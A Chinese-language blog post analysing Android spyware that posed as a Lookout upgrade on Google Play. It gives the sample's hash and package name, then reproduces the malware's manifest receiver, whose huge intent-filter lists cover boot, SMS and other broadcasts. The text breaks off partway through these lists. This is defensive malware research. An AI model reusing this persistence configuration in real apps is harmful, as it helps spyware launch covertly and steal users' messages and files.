本文章由Jack_Jia编写,转载请注明出处。
文章链接:http://blog.csdn.net/jiazhijun/article/details/8649473
作者:Jack_Jia 邮箱:309zhijun@163.com
一、序言
该病毒由TrustGo安全分析人员在Google Play发现,该应用伪装成移动安全软件“Lookout”的升级程序,它可以窃取安卓设备上的短信/彩信、视频文件、SD卡上的任意文件。本文将对该病毒的工作原理进行分析。
二、病毒样本基本信息
Md5:26905184ee9ce89cf12a04cbe00d60c2
Package:com.updateszxt
1、查看AndroidMainfest.xml文件
<receiver android:name=".StartService">
<intent-filter android:priority="100000">
<action android:name="com.android.vending.INSTALL_REFERRER" />
<action android:name="com.lookout.labs.planb.intent.action.LAUNCHED" />
<action android:name="android.bluetooth.intent.action.BONDING_CREATED" />
<action android:name="android.bluetooth.intent.action.BONDING_REMOVED" />
<action android:name="android.bluetooth.intent.action.DISABLED" />
<action android:name="android.bluetooth.intent.action.DISCOVERY_COMPLETED" />
<action android:name="android.bluetooth.intent.action.DISCOVERY_STARTED" />
<action android:name="android.bluetooth.intent.action.ENABLED" />
<action android:name="android.bluetooth.intent.action.HEADSET_STATE_CHANGED" />
<action android:name="android.bluetooth.intent.action.MODE_CHANGED" />
<action android:name="android.bluetooth.intent.action.NAME_CHANGED" />
<action android:name="android.bluetooth.intent.action.PAIRING_CANCEL" />
<action android:name="android.bluetooth.intent.action.PAIRING_REQUEST" />
<action android:name="android.bluetooth.intent.action.REMOTE_ALIAS_CHANGED" />
<action android:name="android.bluetooth.intent.action.REMOTE_ALIAS_CLEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_CONNECTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISAPPEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISAPPEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISCONNECTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISCONNECT_REQUESTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_FOUND" />
<action android:name="android.bluetooth.intent.action.REMOTE_NAME_FAILED" />
<action android:name="android.bluetooth.intent.action.REMOTE_NAME_UPDATED" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.DATA_SMS_RECEIVED" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.POWER_CONNECTED" />
<action android:name="android.intent.action.POWER_DISCONNECTED" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="android.media.VIBRATE_SETTING_CHANGED" />
<action android:name="android.net.wifi.NETWORK_IDS_CHANGED" />
<action android:name="android.net.wifi.RSSI_CHANGED" />
<action android:name="android.net.wifi.SCAN_RESULTS" />
<action android:name="android.net.wifi.STATE_CHANGE" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.wifi.supplicant.CONNECTION_CHANGE" />
<action android:name="android.net.wifi.supplicant.STATE_CHANGE" />
<action android:name="android.provider.Telephony.SIM_FULL" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
<action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.USER_PRESENT" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.ALARM_CHANGED" />
<action android:name="android.intent.action.SYNC_STATE_CHANGED" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CLOSE_SYSTEM_DIALOGS" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_REPLACED" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.PACKAGE_DATA_CLEARED" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.LOCALE_CHANGED" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BATTERY_OKAY" />
<action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
<action android:name="android.intent.action.ACTION_SHUTDOWN" />
<action android:name="android.intent.action.ACTION_REQUEST_SHUTDOWN" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.MEDIA_CHECKING" />
<action android:name="android.intent.action.MEDIA_NOFS" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.INPUT_METHOD_CHANGED" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.DOCK_EVENT" />
<action android:name="android.intent.action.REMOTE_INTENT" />
<action android:name="android.intent.action.PRE_BOOT_COMPLETED" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.bluetooth.adapter.action.STATE_CHANGED" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="com.android.sync.SYNC_CONN_STATUS_CHANGED" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.intent.action.CLOSE_SYSTEM_DIALOGS" />
<action android:name="android.intent.action.PHONE_STATE" />
<action android:name="android.accounts.AccountAuthenticator" />
<action android:name="android.accounts.LOGIN_ACCOUNTS_CHANGED" />
<action android:name="android.intent.action.DOWNLOAD_COMPLETE" />
<action android:name="android.intent.action.DOWNLOAD_NOTIFICATION_CLICKED" />
<action android:name="android.location.PROVIDERS_CHANGED" />
<action android:name="android.speech.action.GET_LANGUAGE_DETAILS" />
<action android:name="android.app.action.ACTION_PASSWORD_CHANGED" />
<action android:name="android.app.action.ACTION_PASSWORD_FAILED" />
<action android:name="android.app.action.ACTION_PASSWORD_SUCCEEDED" />
<action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
<action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED" />
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
<action android:name="android.bluetooth.a2dp.action.SINK_STATE_CHANGED" />
<action android:name="android.bluetooth.adapter.action.DISCOVERY_FINISHED" />
<action android:name="android.bluetooth.adapter.action.DISCOVERY_STARTED" />
<action android:name="android.bluetooth.adapter.action.LOCAL_NAME_CHANGED" />
<action android:name="android.bluetooth.adapter.action.SCAN_MODE_CHANGED" />
<action android:name="android.bluetooth.adapter.action.STATE_CHANGED" />
<action android:name="android.bluetooth.device.action.ACL_CONNECTED" />
<action android:name="android.bluetooth.device.action.ACL_DISCONNECTED" />
<action android:name="android.bluetooth.device.action.ACL_DISCONNECT_REQUESTED" />
<action android:name="android.bluetooth.device.action.BOND_STATE_CHANGED" />
<action android:name="android.bluetooth.device.action.CLASS_CHANGED" />
<action android:name="android.bluetooth.device.action.FOUND" />
<action android:name="android.bluetooth.device.action.NAME_CHANGED" />
<action android:name="android.bluetooth.devicepicker.action.DEVICE_SELECTED" />
<action android:name="android.bluetooth.devicepicker.action.LAUNCH" />
<action android:name="android.bluetooth.headset.action.AUDIO_STATE_CHANGED" />
<action android:name="android.bluetooth.headset.action.STATE_CHANGED" />
<action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
<action android:name="android.intent.action.ACTION_SHUTDOWN" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BATTERY_OKAY" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.DATA_SMS_RECEIVED" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.DOCK_EVENT" />
<action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE" />
<action android:name="android.intent.action.EXTERNAL_APPLICATIONS_UNAVAILABLE" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.INPUT_METHOD_CHANGED" />
<action android:name="android.intent.action.LOCALE_CHANGED" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.MEDIA_CHECKING" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_NOFS" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_DATA_CLEARED" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_REPLACED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.PHONE_STATE" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.USER_PRESENT" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.media.AUDIO_BECOMING_NOISY" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="android.media.SCO_AUDIO_STATE_CHANGED" />
<action android:name="android.media.VIBRATE_SETTING_CHANGED" />
<action android:name="android.media.action.CLOSE_AUDIO_EFFECT_CONTROL_SESSION" />
<action android:name="android.media.action.OPEN_AUDIO_EFFECT_CONTROL_SESSION" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.net.wifi.NETWORK_IDS_CHANGED" />
<action android:name="android.net.wifi.RSSI_CHANGED" />
<action android:name="android.net.wifi.SCAN_RESULTS" />
<action android:name="android.net.wifi.STATE_CHANGE" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.wifi.supplicant.CONNECTION_CHANGE" />
<action android:name="android.net.wifi.supplicant.STATE_CHANGE" />
<action android:name="android.provider.Telephony.SIM_FULL" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
<action android:name="android.provider.Telephony.SMS_REJECTED" />
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
<action android:name="android.speech.tts.TTS_QUEUE_PROCESSING_COMPLETED" />
<action android:name="android.speech.tts.engine.TTS_DATA_INSTALLED" />
<data android:scheme="" />
<data android:scheme="package" />
<data android:scheme="content" />
<data android:scheme="http" />
<data android:scheme="https" />
<data android:scheme="file" />
<data android:scheme="ftp" />
<data android:scheme="about" />
<data android:scheme="javascript" />
<data android:scheme="inline" />
<data android:scheme="sms" />
<data android:scheme="smsto" />
<data android:scheme="mms" />
<data android:scheme="tel" />
<data android:scheme="directory" />
<data android:scheme="folder" />
<data android:scheme="imto" />
<data android:scheme="voicemail" />
<data android:scheme="user" />
</intent-filter>
<intent-filter android:priority="100000">
<action android:name="com.android.vending.INSTALL_REFERRER" />
<action android:name="com.lookout.labs.planb.intent.action.LAUNCHED" />
<action android:name="android.bluetooth.intent.action.BONDING_CREATED" />
<action android:name="android.bluetooth.intent.action.BONDING_REMOVED" />
<action android:name="android.bluetooth.intent.action.DISABLED" />
<action android:name="android.bluetooth.intent.action.DISCOVERY_COMPLETED" />
<action android:name="android.bluetooth.intent.action.DISCOVERY_STARTED" />
<action android:name="android.bluetooth.intent.action.ENABLED" />
<action android:name="android.bluetooth.intent.action.HEADSET_STATE_CHANGED" />
<action android:name="android.bluetooth.intent.action.MODE_CHANGED" />
<action android:name="android.bluetooth.intent.action.NAME_CHANGED" />
<action android:name="android.bluetooth.intent.action.PAIRING_CANCEL" />
<action android:name="android.bluetooth.intent.action.PAIRING_REQUEST" />
<action android:name="android.bluetooth.intent.action.REMOTE_ALIAS_CHANGED" />
<action android:name="android.bluetooth.intent.action.REMOTE_ALIAS_CLEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_CONNECTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISAPPEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISAPPEARED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISCONNECTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_DISCONNECT_REQUESTED" />
<action android:name="android.bluetooth.intent.action.REMOTE_DEVICE_FOUND" />
<action android:name="android.bluetooth.intent.action.REMOTE_NAME_FAILED" />
<action android:name="android.bluetooth.intent.action.REMOTE_NAME_UPDATED" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.DATA_SMS_RECEIVED" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.POWER_CONNECTED" />
<action android:name="android.intent.action.POWER_DISCONNECTED" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="android.media.VIBRATE_SETTING_CHANGED" />
<action android:name="android.net.wifi.NETWORK_IDS_CHANGED" />
<action android:name="android.net.wifi.RSSI_CHANGED" />
<action android:name="android.net.wifi.SCAN_RESULTS" />
<action android:name="android.net.wifi.STATE_CHANGE" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.wifi.supplicant.CONNECTION_CHANGE" />
<action android:name="android.net.wifi.supplicant.STATE_CHANGE" />
<action android:name="android.provider.Telephony.SIM_FULL" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
<action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.USER_PRESENT" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.ALARM_CHANGED" />
<action android:name="android.intent.action.SYNC_STATE_CHANGED" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CLOSE_SYSTEM_DIALOGS" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_REPLACED" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.PACKAGE_DATA_CLEARED" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.WALLPAPER_CHANGED" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.LOCALE_CHANGED" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BATTERY_OKAY" />
<action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
<action android:name="android.intent.action.ACTION_SHUTDOWN" />
<action android:name="android.intent.action.ACTION_REQUEST_SHUTDOWN" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.UMS_CONNECTED" />
<action android:name="android.intent.action.UMS_DISCONNECTED" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.MEDIA_CHECKING" />
<action android:name="android.intent.action.MEDIA_NOFS" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.INPUT_METHOD_CHANGED" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.DOCK_EVENT" />
<action android:name="android.intent.action.REMOTE_INTENT" />
<action android:name="android.intent.action.PRE_BOOT_COMPLETED" />
<action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.bluetooth.adapter.action.STATE_CHANGED" />
<action android:name="android.media.RINGER_MODE_CHANGED" />
<action android:name="com.android.sync.SYNC_CONN_STATUS_CHANGED" />
<action android:name="android.net.conn.BACKGROUND_DATA_SETTING_CHANGED" />
<action android:name="android.intent.action.CLOSE_SYSTEM_DIALOGS" />
<action android:name="android.intent.action.PHONE_STATE" />
<action android:name="android.accounts.AccountAuthenticator" />
<action android:name="android.accounts.LOGIN_ACCOUNTS_CHANGED" />
<action android:name="android.intent.action.DOWNLOAD_COMPLETE" />
<action android:name="android.intent.action.DOWNLOAD_NOTIFICATION_CLICKED" />
<action android:name="android.location.PROVIDERS_CHANGED" />
<action android:name="android.speech.action.GET_LANGUAGE_DETAILS" />
<action android:name="android.app.action.ACTION_PASSWORD_CHANGED" />
<action android:name="android.app.action.ACTION_PASSWORD_FAILED" />
<action android:name="android.app.action.ACTION_PASSWORD_SUCCEEDED" />
<action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
<action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED" />
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
<action android:name="android.bluetooth.a2dp.action.SINK_STATE_CHANGED" />
<action android:name="android.bluetooth.adapter.action.DISCOVERY_FINISHED" />
<action android:name="android.bluetooth.adapter.action.DISCOVERY_STARTED" />
<action android:name="android.bluetooth.adapter.action.LOCAL_NAME_CHANGED" />
<action android:name="android.bluetooth.adapter.action.SCAN_MODE_CHANGED" />
<action android:name="android.bluetooth.adapter.action.STATE_CHANGED" />
<action android:name="android.bluetooth.device.action.ACL_CONNECTED" />
<action android:name="android.bluetooth.device.action.ACL_DISCONNECTED" />
<action android:name="android.bluetooth.device.action.ACL_DISCONNECT_REQUESTED" />
<action android:name="android.bluetooth.device.action.BOND_STATE_CHANGED" />
<action android:name="android.bluetooth.device.action.CLASS_CHANGED" />
<action android:name="android.bluetooth.device.action.FOUND" />
<action android:name="android.bluetooth.device.action.NAME_CHANGED" />
<action android:name="android.bluetooth.devicepicker.action.DEVICE_SELECTED" />
<action android:name="android.bluetooth.devicepicker.action.LAUNCH" />
<action android:name="android.bluetooth.headset.action.AUDIO_STATE_CHANGED" />
<action android:name="android.bluetooth.headset.action.STATE_CHANGED" />
<action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
<action android:name="android.intent.action.ACTION_SHUTDOWN" />
<action android:name="android.intent.action.AIRPLANE_MODE" />
<action android:name="android.intent.action.BATTERY_CHANGED" />
<action android:name="android.intent.action.BATTERY_LOW" />
<action android:name="android.intent.action.BATTERY_OKAY" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.CAMERA_BUTTON" />
<action android:name="android.intent.action.CONFIGURATION_CHANGED" />
<action android:name="android.intent.action.DATA_SMS_RECEIVED" />
<action android:name="android.intent.action.DATE_CHANGED" />
<action android:name="android.intent.action.DEVICE_STORAGE_LOW" />
<action android:name="android.intent.action.DEVICE_STORAGE_OK" />
<action android:name="android.intent.action.DOCK_EVENT" />
<action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE" />
<action android:name="android.intent.action.EXTERNAL_APPLICATIONS_UNAVAILABLE" />
<action android:name="android.intent.action.GTALK_CONNECTED" />
<action android:name="android.intent.action.GTALK_DISCONNECTED" />
<action android:name="android.intent.action.HEADSET_PLUG" />
<action android:name="android.intent.action.INPUT_METHOD_CHANGED" />
<action android:name="android.intent.action.LOCALE_CHANGED" />
<action android:name="android.intent.action.MANAGE_PACKAGE_STORAGE" />
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL" />
<action android:name="android.intent.action.MEDIA_BUTTON" />
<action android:name="android.intent.action.MEDIA_CHECKING" />
<action android:name="android.intent.action.MEDIA_EJECT" />
<action android:name="android.intent.action.MEDIA_MOUNTED" />
<action android:name="android.intent.action.MEDIA_NOFS" />
<action android:name="android.intent.action.MEDIA_REMOVED" />
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED" />
<action android:name="android.intent.action.MEDIA_SCANNER_SCAN_FILE" />
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED" />
<action android:name="android.intent.action.MEDIA_SHARED" />
<action android:name="android.intent.action.MEDIA_UNMOUNTABLE" />
<action android:name="android.intent.action.MEDIA_UNMOUNTED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.PACKAGE_ADDED" />
<action android:name="android.intent.action.PACKAGE_CHANGED" />
<action android:name="android.intent.action.PACKAGE_DATA_CLEARED" />
<action android:name="android.intent.action.PACKAGE_INSTALL" />
<action android:name="android.intent.action.PACKAGE_REMOVED" />
<action android:name="android.intent.action.PACKAGE_REPLACED" />
<action android:name="android.intent.action.PACKAGE_RESTARTED" />
<action android:name="android.intent.action.PHONE_STATE" />
<action android:name="android.intent.action.PROVIDER_CHANGED" />
<action android:name="android.intent.action.REBOOT" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.intent.action.TIMEZONE_CHANGED" />
<action android:name="android.intent.action.TIME_SET" />
<action android:name="android.intent.action.TIME_TICK" />
<action android:name="android.intent.action.UID_REMOVED" />
<action android:name="android.intent.action.UMS_CONNECTED" />
